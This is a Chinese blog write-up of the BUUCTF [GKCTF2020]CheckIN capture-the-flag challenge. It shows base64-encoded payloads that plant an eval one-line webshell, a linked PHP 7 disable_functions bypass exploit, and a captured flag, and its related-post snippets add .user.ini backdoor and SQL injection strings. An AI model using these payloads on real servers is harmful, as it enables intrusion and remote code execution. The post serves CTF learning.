BUUCTF:[GKCTF2020]CheckIN

最新推荐文章于 2024-06-11 18:30:48 发布
最新推荐文章于 2024-06-11 18:30:48 发布
阅读量504 收藏 1
点赞数
分类专栏: CTF_Web_Writeup BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/111301445
版权

先看一下题目给的代码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

代码中有一个$this指针,通过读取Ginkgo的值,进行传参。我们先尝试传入phpinfo() ,构造一个payload。
注:因为存在一个base64_decode函数所以要进行base64编码。

http://(此处为你的url)/?Ginkgo=cGhwaW5mbygpOw==

结果输出为
在这里插入图片描述
在这里我们可以找到被过滤的函数
在这里插入图片描述
回到一开始的代码,从代码中我们看到一个@Eval,可以马上反应我们可以上传一句话木马。
构造一个payloadeval($_POST[123]);,同样是要进行base64处理

http://(你的url)/?Ginkgo=ZXZhbCgkX1BPU1RbMTIzXSk7

然后在蚁剑中进行连接
在这里插入图片描述
进入根目录,我们可以发现一个flag文件,可惜里面什么都没有
在这里插入图片描述
此时我们退出文件,刷新一下,发现一个readflag 的文件,里面是一堆乱码
在这里插入图片描述
然后在看了别的师傅的wp之后,我们把目光放到最开始的phpinfo()中。我们通过phpinfo()知道了php版本为7.3,这个版本有一个漏洞
具体的exp在这里面很详细了

https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

然后我们将其代码下载下来,放入我们的1.php文件中,记得pwn(’’)里面的东西要改成readflag
在这里插入图片描述
通过蚁剑上传文件到tmp目录下
在这里插入图片描述
然后剩下的就是通过之前的一句话来执行这个文件了
在这里插入图片描述
得到flag:

flag{99a2cfe2-9866-480f-9e0c-cb71ce13872c}
FW_ENJOEY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-CheckIn
m0_47571887的博客
11-09 783
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2816
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
BUUCTF---web---[SUCTF 2019]CheckIn
最新发布
2201_75556700的博客
06-11 908
7、先上传.user.ini文件,再上传图片马test.jpg。上传.user.ini后出现下面回显。.user.ini文件内容为:(文件命名必须和上传的图片马文件名一样,我这里是test.jpg)2、上传正常的jpg文件,提示内容不能有<?4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传。5、必须要是图片类型,将一句话木马,添加图片头后再上传。6、上传成功了,但是需要让图片马当成php代码来执行。10、使用系统函数,查看文件根目录,发现flag文件。9、测试,发现文件上传成功。
[BUUCTF]CheckIn (writeup)
weixin_63306244的博客
06-22 162
因为.user.ini是将a.png放到index.php文件的顶部进行执行。回显:exif_imagetype:not image!蚁剑后面的文件是index.php并不是a.png。所以要访问的是index.php。看到这个后就可以直接上蚁剑了。进入后看到是一道上传题。那就只剩下最后一种办法。随后看看了之前用过的。
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1277
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
BUUCTF WEB [SUCTF 2019]CheckIn
Y1da的博客
04-17 301
BUUCTF WEB [SUCTF 2019]CheckIn .user.ini文件 PHP 支持基于每个目录的 INI 文件配置。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 与php.ini不同,.user.ini是一个能被动态加载的ini文件,它实际上是一个可以由用户自定义
checkin:阿拉斯普兰斯
06-30
"checkin-master"这个压缩包文件名可能是项目源代码的主分支或者主目录,暗示着它包含了整个应用的源代码。在解压后,我们可能会找到以下常见的文件和文件夹结构: 1. `index.html`:主HTML文件,定义了网页的结构...
checkin:此仓库已移至https
05-18
这就是全部。 服务器的实现取决于您,但是可以在找到用Go编写的示例服务器。为什么? 2014年4月,我决定尝试从乔治亚州到缅因州的2100英里阿巴拉契亚小径徒步旅行。 我认为跟踪自己的旅程并在以后处理一些数据可能...
checkin:解放双手才是王道
05-04
标题“checkin:解放双手才是王道”暗示了一个与自动化的检查-in过程相关的项目或工具,可能是使用Python编程语言实现的。在IT行业中,"checkin"通常指的是开发者提交代码到版本控制系统(如Git)的过程,或者是酒店...
LBS观景台董焘:谈checkin未来的发展趋势.docx
09-26
"LBS观景台董焘:谈checkin未来的发展趋势" LBS观景台董焘:谈checkin未来的发展趋势 在移动互联网时代,LBS(Location-Based Service,基于位置的服务)和checkin(签到)等概念已经成为热门话题。董焘是LBS观景...
checkin-detector:酒店入住 人脸检测
05-16
checkin-detetor 人脸检测 / 人脸识别 / 人脸搜索 / 身份证识别 / 人脸比对 可实现实时拍照与身份证照片进行对比. Get Start $ git clone git@github.com:CNBlackJ/checkin-detector.git && cd checkin-detector $ ...
buuctf crypto 【[GXYCTF2019]CheckIn】解题记录
jsbbd12的博客
09-11 321
buuctf 密码学刷题记录
BUUCTF_web_CheckIn
silence1_的博客
08-31 2178
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
[GKCTF2020]CheckIN
末初的CSDN博客
06-17 1058
题目复现地址 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo'];
[NISACTF 2022]checkin
qq_40567274的博客
04-08 4595
[NISACTF 2022] 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 提示:以下是本篇文章正文内容,下面案例可供参考 题目-join-us -1' || (select*from aa)# -1'||extractvalue(1,concat(0x5c,(select group_concat(table_name)from information_schema.tables where table_schema like 'sqlsql')))# -1' || extrac
[GKCTF2020]web
臭nana的博客
05-26 1063
CheckIN 打开题目得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$t
BUUCTF_web_checkln
vegetable_haker的博客
10-11 816
BUUCTF_web_checkln方法步骤 方法 利用.user.ini隐藏后门。配置项auto_prepend_file 会让php文件在执行前先包含一个指定的文件,通过这个配置项,我们就可以来隐藏自己的后门 步骤 1.新建文件.user.ini,写入 GIF89a //绕过exif_imagetype() auto_prepend_file=test.jpg...
【学习笔记 22】 buu [GKCTF2020]CheckIN
weixin_43553654的博客
06-25 559
0x00 知识点 任意文件写入漏洞,部分过滤的绕过 0x01 解题过程 打开一看,代码审计 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $th
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值